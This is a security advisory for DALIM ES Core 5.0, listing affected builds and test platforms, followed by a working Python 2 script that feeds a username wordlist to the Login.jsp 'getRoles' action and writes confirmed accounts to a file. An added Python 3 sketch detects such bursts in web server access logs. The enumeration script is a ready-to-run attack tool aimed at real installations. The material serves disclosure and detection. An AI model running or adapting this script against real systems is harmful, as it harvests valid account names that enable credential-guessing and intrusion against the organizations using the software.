DALIM SOFTWARE ES Core 5.0 Build 7184.1 User Enumeration
Source: zeroscience.mk  Author: LiquidWorm  Published: 2017-08-11
#!/usr/bin/env python
#
#
# DALIM SOFTWARE ES Core 5.0 build 7184.1 User Enumeration Weakness
#
#
# Vendor: Dalim Software GmbH
# Product web page: https://www.dalim.com
# Affected version: ES/ESPRiT 5.0 (build 7184.1)
#                                 (build 7163.2)
#                                 (build 7163.0)
#                                 (build 7135.0)
#                                 (build 7114.1)
#                                 (build 7114.0)
#                                 (build 7093.1)
#                                 (build 7093.0)
#                                 (build 7072.0)
#                                 (build 7051.3)
#                                 (build 7051.1)
#                                 (build 7030.0)
#                                 (build 7009.0)
#                                 (build 6347.0)
#                                 (build 6326.0)
#                                 (build 6305.1)
#                                 (build 6235.9)
#                                 (build 6172.1)
#                   ES/ESPRiT 4.5 (build 6326.0)
#                                 (build 6144.2)
#                                 (build 5180.2)
#                                 (build 5096.0)
#                                 (build 4314.3)
#                                 (build 4314.0)
#                                 (build 4146.4)
#                                 (build 3308.3)
#                   ES/ESPRiT 4.0 (build 4202.0)
#                                 (build 4132.1)
#                                 (build 2235.0)
#                   ES/ESPRiT 3.0
#
# Summary: ES is the new Enterprise Solution from DALIM SOFTWARE built
# from the successful TWIST, DIALOGUE and MISTRAL product lines. The ES
# Core is the engine that can handle project tracking, JDF device workflow,
# dynamic user interface building, volume management. Each ES installation
# will have different features, depending on the license installed: online
# approval, prepress workflow, project tracking, imposition management...
#
# ES is a collaborative digital asset production and management platform,
# offering services ranging from online approval to web-based production
# environment for all participants of the production cycle, including brand
# owners, agencies, publishers, pre-media, printers and multichannel service
# provider. ES lets users plan, execute and control any aspect of media
# production, regardless of the final use of the output (print, web, ebook,
# movie, and others). It ensures productivity and longterm profitability.
#
# Desc: The weakness is caused due to the 'Login.jsp' script enumerating
# the list of valid usernames when some characters are provided via the
# 'login' parameter.
#
# Tested on: Red Hat Enterprise Linux Server release 7.3 (Maipo)
#            CentOS 7
#            Apache Tomcat/7.0.78
#            Apache Tomcat/7.0.67
#            Apache Tomcat/7.0.42
#            Apache Tomcat/6.0.35
#            Apache-Coyote/1.1
#            Java/1.7.0_80
#            Java/1.6.0_21
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2017-5425
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5425.php
#
#
# 15.06.2017
#


import argparse
import requests
import sys

from colorama import Fore, Back, Style, init

init()

print 'User Enumeration Tool v0.3 for DALiM ES <= v5.0'
parser = argparse.ArgumentParser()
parser.add_argument('-t', help='target IP or hostname', action='store', dest='target')
parser.add_argument('-f', help='username wordlist', action='store', dest='file')

args = parser.parse_args()
if len(sys.argv) != 5:
	parser.print_help()
	sys.exit()

host = args.target
fn = args.file

try:
	users = open(args.file, 'r')
except(IOError):
	print '[!] Error opening \'' +fn+ '\' file.'
	sys.exit()
lines = users.read().splitlines()
print '[*] Loaded %d usernames for testing.\n' % len(open(fn).readlines())
users.close()
results = open('validusers.txt', 'w')

for line in lines:
	try:
		r = requests.post("http://" +host+ "/Esprit/public/Login.jsp", data={'actionRole' : 'getRoles', 'login' : line})
		print '[+] Testing username: ' +Fore.GREEN+line+Fore.RESET
		testingus = r.text[50:72]
		if testingus[19:20] != "\"":
			print '[!] Found ' +Style.BRIGHT+Fore.RED+line+Fore.RESET+Style.RESET_ALL+ ' as valid registered user.'
			results.write('%s\n' % line)
	except:
		print '[!] Error connecting to http://'+host
		sys.exit()

results.close()
print '\n[*] Enumeration completed!'
print '[*] Valid usernames successfully written to \'validusers.txt\' file.\n'
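
Detection side of the weakness described in the advisory, as an added example (not part of the original advisory or of the vendor's code): a Python 3 sketch that flags clients sending bursts of POST requests to Login.jsp in a web server access log. The Common Log Format layout, the threshold, the window and the sample log lines are assumptions made for this example; only the request path comes from the advisory.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Request path taken from the advisory above; everything else is an assumption.
LOGIN_PATH = "/Esprit/public/Login.jsp"

# Common Log Format: client, identity, user, [timestamp], "request", status, size.
CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def sample_log():
    """Constructed sample lines (documentation IP ranges), not real traffic."""
    post = '%s - - [11/Aug/2017:%s +0000] "POST ' + LOGIN_PATH + ' HTTP/1.1" 200 118'
    lines = [post % ("192.0.2.10", "10:00:%02d" % s) for s in range(8)]
    lines.append('198.51.100.7 - - [11/Aug/2017:10:00:03 +0000] '
                 '"GET ' + LOGIN_PATH + ' HTTP/1.1" 200 5120')
    lines.append(post % ("198.51.100.7", "10:00:09"))
    lines.append(post % ("198.51.100.7", "10:05:30"))
    return lines

def find_enumeration(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: peak count} for clients that sent at least
    `threshold` POSTs to LOGIN_PATH within any sliding `window`.
    Each client's lines are assumed to be in chronological order."""
    recent = defaultdict(deque)   # client ip -> timestamps inside the window
    peaks = {}
    for line in lines:
        m = CLF.match(line)
        if not m or m["method"] != "POST":
            continue
        if m["uri"].split("?", 1)[0] != LOGIN_PATH:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        while ts - q[0] > window:     # drop requests older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[m["ip"]] = max(peaks.get(m["ip"], 0), len(q))
    return peaks

if __name__ == "__main__":
    for ip, count in find_enumeration(sample_log()).items():
        print("possible username enumeration from %s: %d POSTs in window" % (ip, count))
```

A standard access log does not record the POST body, so the 'actionRole' and 'login' parameters are not visible to this check; the request rate per client is the only signal it uses.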

 